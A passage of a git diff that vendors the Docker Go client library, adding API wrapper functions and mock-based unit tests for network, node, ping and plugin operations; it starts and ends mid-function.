+func (cli *Client) NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error) { + var networkResource types.NetworkResource + resp, err := cli.get(ctx, "/networks/"+networkID, nil, nil) + if err != nil { + if resp.statusCode == http.StatusNotFound { + return networkResource, nil, networkNotFoundError{networkID} + } + return networkResource, nil, err + } + defer ensureReaderClosed(resp) + + body, err := ioutil.ReadAll(resp.body) + if err != nil { + return networkResource, nil, err + } + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&networkResource) + return networkResource, body, err +} diff --git a/vendor/github.com/docker/docker/client/network_inspect_test.go b/vendor/github.com/docker/docker/client/network_inspect_test.go new file mode 100644 index 0000000000..1f926d66ba --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_inspect_test.go @@ -0,0 +1,69 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestNetworkInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.NetworkInspect(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkInspectContainerNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, err := client.NetworkInspect(context.Background(), "unknown") + if err == nil || !IsErrNetworkNotFound(err) { + t.Fatalf("expected a containerNotFound error, got %v", err) + } +} + +func TestNetworkInspect(t *testing.T) { + expectedURL := "/networks/network_id" + client := &Client{ + client: newMockClient(func(req *http.Request) 
(*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "GET" { + return nil, fmt.Errorf("expected GET method, got %s", req.Method) + } + + content, err := json.Marshal(types.NetworkResource{ + Name: "mynetwork", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + r, err := client.NetworkInspect(context.Background(), "network_id") + if err != nil { + t.Fatal(err) + } + if r.Name != "mynetwork" { + t.Fatalf("expected `mynetwork`, got %s", r.Name) + } +} diff --git a/vendor/github.com/docker/docker/client/network_list.go b/vendor/github.com/docker/docker/client/network_list.go new file mode 100644 index 0000000000..e566a93e23 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_list.go @@ -0,0 +1,31 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// NetworkList returns the list of networks configured in the docker host. 
+func (cli *Client) NetworkList(ctx context.Context, options types.NetworkListOptions) ([]types.NetworkResource, error) { + query := url.Values{} + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cli.version, options.Filters) + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + var networkResources []types.NetworkResource + resp, err := cli.get(ctx, "/networks", query, nil) + if err != nil { + return networkResources, err + } + err = json.NewDecoder(resp.body).Decode(&networkResources) + ensureReaderClosed(resp) + return networkResources, err +} diff --git a/vendor/github.com/docker/docker/client/network_list_test.go b/vendor/github.com/docker/docker/client/network_list_test.go new file mode 100644 index 0000000000..4d443496ac --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_list_test.go @@ -0,0 +1,108 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +func TestNetworkListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.NetworkList(context.Background(), types.NetworkListOptions{ + Filters: filters.NewArgs(), + }) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkList(t *testing.T) { + expectedURL := "/networks" + + noDanglingFilters := filters.NewArgs() + noDanglingFilters.Add("dangling", "false") + + danglingFilters := filters.NewArgs() + danglingFilters.Add("dangling", "true") + + labelFilters := filters.NewArgs() + labelFilters.Add("label", "label1") + labelFilters.Add("label", "label2") + + listCases := []struct { + options types.NetworkListOptions + expectedFilters string + }{ + { + options: 
types.NetworkListOptions{ + Filters: filters.NewArgs(), + }, + expectedFilters: "", + }, { + options: types.NetworkListOptions{ + Filters: noDanglingFilters, + }, + expectedFilters: `{"dangling":{"false":true}}`, + }, { + options: types.NetworkListOptions{ + Filters: danglingFilters, + }, + expectedFilters: `{"dangling":{"true":true}}`, + }, { + options: types.NetworkListOptions{ + Filters: labelFilters, + }, + expectedFilters: `{"label":{"label1":true,"label2":true}}`, + }, + } + + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "GET" { + return nil, fmt.Errorf("expected GET method, got %s", req.Method) + } + query := req.URL.Query() + actualFilters := query.Get("filters") + if actualFilters != listCase.expectedFilters { + return nil, fmt.Errorf("filters not set in URL query properly. 
Expected '%s', got %s", listCase.expectedFilters, actualFilters) + } + content, err := json.Marshal([]types.NetworkResource{ + { + Name: "network", + Driver: "bridge", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + networkResources, err := client.NetworkList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(networkResources) != 1 { + t.Fatalf("expected 1 network resource, got %v", networkResources) + } + } +} diff --git a/vendor/github.com/docker/docker/client/network_prune.go b/vendor/github.com/docker/docker/client/network_prune.go new file mode 100644 index 0000000000..7352a7f0c5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_prune.go @@ -0,0 +1,36 @@ +package client + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// NetworksPrune requests the daemon to delete unused networks +func (cli *Client) NetworksPrune(ctx context.Context, pruneFilters filters.Args) (types.NetworksPruneReport, error) { + var report types.NetworksPruneReport + + if err := cli.NewVersionError("1.25", "network prune"); err != nil { + return report, err + } + + query, err := getFiltersQuery(pruneFilters) + if err != nil { + return report, err + } + + serverResp, err := cli.post(ctx, "/networks/prune", query, nil, nil) + if err != nil { + return report, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { + return report, fmt.Errorf("Error retrieving network prune report: %v", err) + } + + return report, nil +} diff --git a/vendor/github.com/docker/docker/client/network_remove.go b/vendor/github.com/docker/docker/client/network_remove.go new file mode 100644 index 0000000000..6bd6748924 --- /dev/null +++ 
b/vendor/github.com/docker/docker/client/network_remove.go @@ -0,0 +1,10 @@ +package client + +import "golang.org/x/net/context" + +// NetworkRemove removes an existent network from the docker host. +func (cli *Client) NetworkRemove(ctx context.Context, networkID string) error { + resp, err := cli.delete(ctx, "/networks/"+networkID, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/network_remove_test.go b/vendor/github.com/docker/docker/client/network_remove_test.go new file mode 100644 index 0000000000..2a7b9640c1 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_remove_test.go @@ -0,0 +1,47 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestNetworkRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.NetworkRemove(context.Background(), "network_id") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkRemove(t *testing.T) { + expectedURL := "/networks/network_id" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.NetworkRemove(context.Background(), "network_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/node_inspect.go b/vendor/github.com/docker/docker/client/node_inspect.go new file mode 100644 index 
0000000000..abf505d29c --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_inspect.go @@ -0,0 +1,33 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// NodeInspectWithRaw returns the node information. +func (cli *Client) NodeInspectWithRaw(ctx context.Context, nodeID string) (swarm.Node, []byte, error) { + serverResp, err := cli.get(ctx, "/nodes/"+nodeID, nil, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return swarm.Node{}, nil, nodeNotFoundError{nodeID} + } + return swarm.Node{}, nil, err + } + defer ensureReaderClosed(serverResp) + + body, err := ioutil.ReadAll(serverResp.body) + if err != nil { + return swarm.Node{}, nil, err + } + + var response swarm.Node + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&response) + return response, body, err +} diff --git a/vendor/github.com/docker/docker/client/node_inspect_test.go b/vendor/github.com/docker/docker/client/node_inspect_test.go new file mode 100644 index 0000000000..fc13283084 --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_inspect_test.go @@ -0,0 +1,65 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestNodeInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.NodeInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNodeInspectNodeNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := 
client.NodeInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrNodeNotFound(err) { + t.Fatalf("expected an nodeNotFoundError error, got %v", err) + } +} + +func TestNodeInspect(t *testing.T) { + expectedURL := "/nodes/node_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Node{ + ID: "node_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + nodeInspect, _, err := client.NodeInspectWithRaw(context.Background(), "node_id") + if err != nil { + t.Fatal(err) + } + if nodeInspect.ID != "node_id" { + t.Fatalf("expected `node_id`, got %s", nodeInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/node_list.go b/vendor/github.com/docker/docker/client/node_list.go new file mode 100644 index 0000000000..3e8440f08e --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_list.go @@ -0,0 +1,36 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// NodeList returns the list of nodes. 
+func (cli *Client) NodeList(ctx context.Context, options types.NodeListOptions) ([]swarm.Node, error) { + query := url.Values{} + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParam(options.Filters) + + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/nodes", query, nil) + if err != nil { + return nil, err + } + + var nodes []swarm.Node + err = json.NewDecoder(resp.body).Decode(&nodes) + ensureReaderClosed(resp) + return nodes, err +} diff --git a/vendor/github.com/docker/docker/client/node_list_test.go b/vendor/github.com/docker/docker/client/node_list_test.go new file mode 100644 index 0000000000..0251b5cce4 --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_list_test.go @@ -0,0 +1,94 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestNodeListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.NodeList(context.Background(), types.NodeListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNodeList(t *testing.T) { + expectedURL := "/nodes" + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + + listCases := []struct { + options types.NodeListOptions + expectedQueryParams map[string]string + }{ + { + options: types.NodeListOptions{}, + expectedQueryParams: map[string]string{ + "filters": "", + }, + }, + { + options: types.NodeListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": `{"label":{"label1":true,"label2":true}}`, + }, + }, + } + for _, 
listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]swarm.Node{ + { + ID: "node_id1", + }, + { + ID: "node_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + nodes, err := client.NodeList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(nodes) != 2 { + t.Fatalf("expected 2 nodes, got %v", nodes) + } + } +} diff --git a/vendor/github.com/docker/docker/client/node_remove.go b/vendor/github.com/docker/docker/client/node_remove.go new file mode 100644 index 0000000000..0a77f3d578 --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_remove.go @@ -0,0 +1,21 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + + "golang.org/x/net/context" +) + +// NodeRemove removes a Node. 
+func (cli *Client) NodeRemove(ctx context.Context, nodeID string, options types.NodeRemoveOptions) error { + query := url.Values{} + if options.Force { + query.Set("force", "1") + } + + resp, err := cli.delete(ctx, "/nodes/"+nodeID, query, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/node_remove_test.go b/vendor/github.com/docker/docker/client/node_remove_test.go new file mode 100644 index 0000000000..f2f8adc4a3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_remove_test.go @@ -0,0 +1,69 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + + "golang.org/x/net/context" +) + +func TestNodeRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.NodeRemove(context.Background(), "node_id", types.NodeRemoveOptions{Force: false}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNodeRemove(t *testing.T) { + expectedURL := "/nodes/node_id" + + removeCases := []struct { + force bool + expectedForce string + }{ + { + expectedForce: "", + }, + { + force: true, + expectedForce: "1", + }, + } + + for _, removeCase := range removeCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + force := req.URL.Query().Get("force") + if force != removeCase.expectedForce { + return nil, fmt.Errorf("force not set in URL query properly. 
expected '%s', got %s", removeCase.expectedForce, force) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.NodeRemove(context.Background(), "node_id", types.NodeRemoveOptions{Force: removeCase.force}) + if err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/client/node_update.go b/vendor/github.com/docker/docker/client/node_update.go new file mode 100644 index 0000000000..3ca9760282 --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_update.go @@ -0,0 +1,18 @@ +package client + +import ( + "net/url" + "strconv" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// NodeUpdate updates a Node. +func (cli *Client) NodeUpdate(ctx context.Context, nodeID string, version swarm.Version, node swarm.NodeSpec) error { + query := url.Values{} + query.Set("version", strconv.FormatUint(version.Index, 10)) + resp, err := cli.post(ctx, "/nodes/"+nodeID+"/update", query, node, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/node_update_test.go b/vendor/github.com/docker/docker/client/node_update_test.go new file mode 100644 index 0000000000..613ff104eb --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_update_test.go @@ -0,0 +1,49 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" +) + +func TestNodeUpdateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.NodeUpdate(context.Background(), "node_id", swarm.Version{}, swarm.NodeSpec{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNodeUpdate(t *testing.T) { + expectedURL 
:= "/nodes/node_id/update" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.NodeUpdate(context.Background(), "node_id", swarm.Version{}, swarm.NodeSpec{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/ping.go b/vendor/github.com/docker/docker/client/ping.go new file mode 100644 index 0000000000..22dcda24fd --- /dev/null +++ b/vendor/github.com/docker/docker/client/ping.go @@ -0,0 +1,30 @@ +package client + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// Ping pings the server and return the value of the "Docker-Experimental" & "API-Version" headers +func (cli *Client) Ping(ctx context.Context) (types.Ping, error) { + var ping types.Ping + req, err := cli.buildRequest("GET", fmt.Sprintf("%s/_ping", cli.basePath), nil, nil) + if err != nil { + return ping, err + } + serverResp, err := cli.doRequest(ctx, req) + if err != nil { + return ping, err + } + defer ensureReaderClosed(serverResp) + + ping.APIVersion = serverResp.header.Get("API-Version") + + if serverResp.header.Get("Docker-Experimental") == "true" { + ping.Experimental = true + } + + return ping, nil +} diff --git a/vendor/github.com/docker/docker/client/plugin_create.go b/vendor/github.com/docker/docker/client/plugin_create.go new file mode 100644 index 0000000000..a660ba5733 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_create.go @@ -0,0 +1,26 @@ +package client + +import ( + "io" + "net/http" + "net/url" + + "github.com/docker/docker/api/types" + 
"golang.org/x/net/context" +) + +// PluginCreate creates a plugin +func (cli *Client) PluginCreate(ctx context.Context, createContext io.Reader, createOptions types.PluginCreateOptions) error { + headers := http.Header(make(map[string][]string)) + headers.Set("Content-Type", "application/tar") + + query := url.Values{} + query.Set("name", createOptions.RepoName) + + resp, err := cli.postRaw(ctx, "/plugins/create", query, createContext, headers) + if err != nil { + return err + } + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/plugin_disable.go b/vendor/github.com/docker/docker/client/plugin_disable.go new file mode 100644 index 0000000000..30467db742 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_disable.go @@ -0,0 +1,19 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// PluginDisable disables a plugin +func (cli *Client) PluginDisable(ctx context.Context, name string, options types.PluginDisableOptions) error { + query := url.Values{} + if options.Force { + query.Set("force", "1") + } + resp, err := cli.post(ctx, "/plugins/"+name+"/disable", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/plugin_disable_test.go b/vendor/github.com/docker/docker/client/plugin_disable_test.go new file mode 100644 index 0000000000..a4de45be2d --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_disable_test.go @@ -0,0 +1,48 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestPluginDisableError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.PluginDisable(context.Background(), "plugin_name", types.PluginDisableOptions{}) + if err == nil || err.Error() 
!= "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginDisable(t *testing.T) { + expectedURL := "/plugins/plugin_name/disable" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.PluginDisable(context.Background(), "plugin_name", types.PluginDisableOptions{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_enable.go b/vendor/github.com/docker/docker/client/plugin_enable.go new file mode 100644 index 0000000000..95517c4b80 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_enable.go @@ -0,0 +1,19 @@ +package client + +import ( + "net/url" + "strconv" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// PluginEnable enables a plugin +func (cli *Client) PluginEnable(ctx context.Context, name string, options types.PluginEnableOptions) error { + query := url.Values{} + query.Set("timeout", strconv.Itoa(options.Timeout)) + + resp, err := cli.post(ctx, "/plugins/"+name+"/enable", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/plugin_enable_test.go b/vendor/github.com/docker/docker/client/plugin_enable_test.go new file mode 100644 index 0000000000..b27681348f --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_enable_test.go @@ -0,0 +1,48 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func 
TestPluginEnableError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.PluginEnable(context.Background(), "plugin_name", types.PluginEnableOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginEnable(t *testing.T) { + expectedURL := "/plugins/plugin_name/enable" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.PluginEnable(context.Background(), "plugin_name", types.PluginEnableOptions{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_inspect.go b/vendor/github.com/docker/docker/client/plugin_inspect.go new file mode 100644 index 0000000000..89f39ee2c6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_inspect.go @@ -0,0 +1,32 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// PluginInspectWithRaw inspects an existing plugin +func (cli *Client) PluginInspectWithRaw(ctx context.Context, name string) (*types.Plugin, []byte, error) { + resp, err := cli.get(ctx, "/plugins/"+name+"/json", nil, nil) + if err != nil { + if resp.statusCode == http.StatusNotFound { + return nil, nil, pluginNotFoundError{name} + } + return nil, nil, err + } + + defer ensureReaderClosed(resp) + body, err := ioutil.ReadAll(resp.body) + if err != nil { + return nil, nil, err + } + var p 
types.Plugin + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&p) + return &p, body, err +} diff --git a/vendor/github.com/docker/docker/client/plugin_inspect_test.go b/vendor/github.com/docker/docker/client/plugin_inspect_test.go new file mode 100644 index 0000000000..fae407eb9b --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_inspect_test.go @@ -0,0 +1,54 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestPluginInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.PluginInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginInspect(t *testing.T) { + expectedURL := "/plugins/plugin_name" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(types.Plugin{ + ID: "plugin_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + pluginInspect, _, err := client.PluginInspectWithRaw(context.Background(), "plugin_name") + if err != nil { + t.Fatal(err) + } + if pluginInspect.ID != "plugin_id" { + t.Fatalf("expected `plugin_id`, got %s", pluginInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_install.go b/vendor/github.com/docker/docker/client/plugin_install.go new file mode 100644 index 0000000000..3217c4cf39 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_install.go @@ 
-0,0 +1,113 @@ +package client + +import ( + "encoding/json" + "io" + "net/http" + "net/url" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +// PluginInstall installs a plugin +func (cli *Client) PluginInstall(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) { + query := url.Values{} + if _, err := reference.ParseNamed(options.RemoteRef); err != nil { + return nil, errors.Wrap(err, "invalid remote reference") + } + query.Set("remote", options.RemoteRef) + + privileges, err := cli.checkPluginPermissions(ctx, query, options) + if err != nil { + return nil, err + } + + // set name for plugin pull, if empty should default to remote reference + query.Set("name", name) + + resp, err := cli.tryPluginPull(ctx, query, privileges, options.RegistryAuth) + if err != nil { + return nil, err + } + + name = resp.header.Get("Docker-Plugin-Name") + + pr, pw := io.Pipe() + go func() { // todo: the client should probably be designed more around the actual api + _, err := io.Copy(pw, resp.body) + if err != nil { + pw.CloseWithError(err) + return + } + defer func() { + if err != nil { + delResp, _ := cli.delete(ctx, "/plugins/"+name, nil, nil) + ensureReaderClosed(delResp) + } + }() + if len(options.Args) > 0 { + if err := cli.PluginSet(ctx, name, options.Args); err != nil { + pw.CloseWithError(err) + return + } + } + + if options.Disabled { + pw.Close() + return + } + + err = cli.PluginEnable(ctx, name, types.PluginEnableOptions{Timeout: 0}) + pw.CloseWithError(err) + }() + return pr, nil +} + +func (cli *Client) tryPluginPrivileges(ctx context.Context, query url.Values, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.get(ctx, "/plugins/privileges", query, headers) +} + +func (cli *Client) tryPluginPull(ctx context.Context, query url.Values, privileges 
